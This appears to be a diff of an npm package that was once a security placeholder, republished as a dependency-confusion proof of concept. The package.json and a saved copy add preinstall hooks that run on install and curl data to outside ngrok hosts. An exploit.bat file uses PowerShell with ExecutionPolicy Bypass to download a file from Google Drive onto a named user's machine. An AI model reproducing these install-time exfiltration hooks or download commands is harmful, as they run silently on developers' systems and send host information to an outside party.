1	+ \|1\|hAkID7hatXT1a6M7ajlyZPpSkF8=\|kncqw+21A5d2r+H/VEu2NS/KylU= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIII/rK32lDm0wteqXPKQZiqRxMQlA2IcT1azYWLHzTMe

package/.sudo_as_admin_successful ADDED Viewed

File without changes

package/base.ldif ADDED Viewed

@@ -0,0 +1,13 @@
+dn: dc=ldap,dc=example,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Example LDAP Organization
+dc: ldap
+dn: cn=admin,ldap,dc=example,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: Directory Administrator
+userPassword: {SSHA}your_encrypted_password

package/exploit.bat ADDED Viewed

	@@ -0,0 +1 @@
1	+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "& { try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1dTAN7CRkUj25ViAGpiUCZOCiyjpJGIQP' -OutFile 'C:\Users\ADClient1-Admin\Downloads\exploit.txt' } catch { Write-Error $_ } }"

package/exploit.txt ADDED Viewed

@@ -0,0 +1,26 @@
+This file is a "malicious" file
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠟⠃⠀⠀⠙⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠾⢛⠒⠀⠀⠀⠀⠀⠀⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣶⣄⡈⠓⢄⠠⡀⠀⠀⠀⣄⣷⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣷⠀⠈⠱⡄⠑⣌⠆⠀⠀⡜⢻⠀⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡿⠳⡆⠐⢿⣆⠈⢿⠀⠀⡇⠘⡆⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣷⡇⠀⠀⠈⢆⠈⠆⢸⠀⠀⢣⠀⠀⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣧⠀⠀⠈⢂⠀⡇⠀⠀⢨⠓⣄⠀⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣦⣤⠖⡏⡸⠀⣀⡴⠋⠀⠈⠢⡀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠁⣹⣿⣿⣿⣷⣾⠽⠖⠊⢹⣀⠄⠀⠀⠀⠈⢣⡀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡟⣇⣰⢫⢻⢉⠉⠀⣿⡆⠀⠀⡸⡏⠀⠀⠀⠀⠀⠀⢇
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡇⡇⠈⢸⢸⢸⠀⠀⡇⡇⠀⠀⠁⠻⡄⡠⠂⠀⠀⠀⠘
+⢤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⠓⡇⠀⠸⡆⢸⠀⢠⣿⠀⠀⠀⠀⣰⣿⣵⡆⠀⠀⠀⠀
+⠈⢻⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⣦⣀⡇⠀⢧⡇⠀⠀⢺⡟⠀⠀⠀⢰⠉⣰⠟⠊⣠⠂⠀⡸
+⠀⠀⢻⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢧⡙⠺⠿⡇⠀⠘⠇⠀⠀⢸⣧⠀⠀⢠⠃⣾⣌⠉⠩⠭⠍⣉⡇
+⠀⠀⠀⠻⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣞⣋⠀⠈⠀⡳⣧⠀⠀⠀⠀⠀⢸⡏⠀⠀⡞⢰⠉⠉⠉⠉⠉⠓⢻⠃
+⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⢀⣀⠠⠤⣤⣤⠤⠞⠓⢠⠈⡆⠀⢣⣸⣾⠆⠀⠀⠀⠀⠀⢀⣀⡼⠁⡿⠈⣉⣉⣒⡒⠢⡼⠀
+⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣎⣽⣶⣤⡶⢋⣤⠃⣠⡦⢀⡼⢦⣾⡤⠚⣟⣁⣀⣀⣀⣀⠀⣀⣈⣀⣠⣾⣅⠀⠑⠂⠤⠌⣩⡇⠀
+⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡁⣺⢁⣞⣉⡴⠟⡀⠀⠀⠀⠁⠸⡅⠀⠈⢷⠈⠏⠙⠀⢹⡛⠀⢉⠀⠀⠀⣀⣀⣼⡇⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⡟⢡⠖⣡⡴⠂⣀⣀⣀⣰⣁⣀⣀⣸⠀⠀⠀⠀⠈⠁⠀⠀⠈⠀⣠⠜⠋⣠⠁⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⡟⢿⣿⣿⣷⡟⢋⣥⣖⣉⠀⠈⢁⡀⠤⠚⠿⣷⡦⢀⣠⣀⠢⣄⣀⡠⠔⠋⠁⠀⣼⠃⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⡄⠈⠻⣿⣿⢿⣛⣩⠤⠒⠉⠁⠀⠀⠀⠀⠀⠉⠒⢤⡀⠉⠁⠀⠀⠀⠀⠀⢀⡿⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣤⣤⠴⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⠤⠀⠀⠀⠀⠀⢩⠇⠀⠀⠀
+⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

package/package.json CHANGED Viewed

@@ -1,6 +1,12 @@
 {
-  "name": "myconfusedfunctionpoctestpackage",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+"name": "myconfusedfunctionpoctestpackage",
+"version": "1.0.7",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "ping -c 1 instance-20250220-203301 | curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode @- https://1c6c-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
 }

package/package.json.save ADDED Viewed

@@ -0,0 +1,12 @@
+{
+"name": "mygcpconfusedfunctionpocmaliciouspackage",
+"version": "1.1.1",
+"description": "poc",
+"main": "index.js",
+"scripts": {
+"test": "echo 'testa'",
+"preinstall": "echo 'hello world'|jq -sRr|curl -X POST https://d2b8-34-168-173-48.ngrok-free.app"
+},
+"author": "me",
+"license": "ISC"
+}

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=myconfusedfunctionpoctestpackage for more information.